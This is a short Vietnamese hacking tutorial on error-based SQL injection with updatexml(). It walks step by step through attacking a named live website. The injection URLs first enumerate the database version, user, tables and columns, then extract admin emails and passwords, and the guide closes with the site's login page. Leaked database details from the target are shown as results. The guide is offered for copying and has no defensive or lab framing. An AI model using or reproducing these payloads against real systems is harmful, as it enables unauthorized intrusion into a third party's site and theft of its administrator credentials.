XPATH Attack

 Hướng Dẫn Khai Thác SQLi Dạng XPATH

 

Get version(), database(), user():

 

http://coex.com.vn/?option=hotro&catId=121 and updatexml(0,concat(0x7c,version(),0x7c,database(), 0x7c,user()),0)– -

 

XPATH syntax error: ‘|5.6.13-log|admin_coex|coex@loca’

 

Get Table:

http://coex.com.vn/?option=hotro&catId=121 and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)– -

Tăng Limit lên dần để get table cần tìm. 

+Ví dụ: limit 0,1 rồi limit 1,1 rồi limit 2,1…Số đầu là số thứ tự table, số sau là số table cần hiện ra, XPATH cũng như error-based, mỗi lần query được 1 table/colum.

==> admin, admin_rights, admintype

Get Column:

http://coex.com.vn/?option=hotro&catId=121 and updatexml(0,concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns WHERE table_name=0x61646d696e limit 0,1)),0)– -

Tăng Limit lên dần để get column cần tìm. Tuơng tự như lúc truy vấn table

==> id, idtype, firstname, astname, email, password, status

Get tài khoản:

http://coex.com.vn/?option=hotro&catId=121 and updatexml(0,concat(0x7c,(select concat(email,0x7c,password) from admin limit 0,1)),0)– -

Link login: http://coex.com.vn/login.php

 

Vui lòng copy nhớ ghi nguồn. Xin Cám Ơn.

Good Luck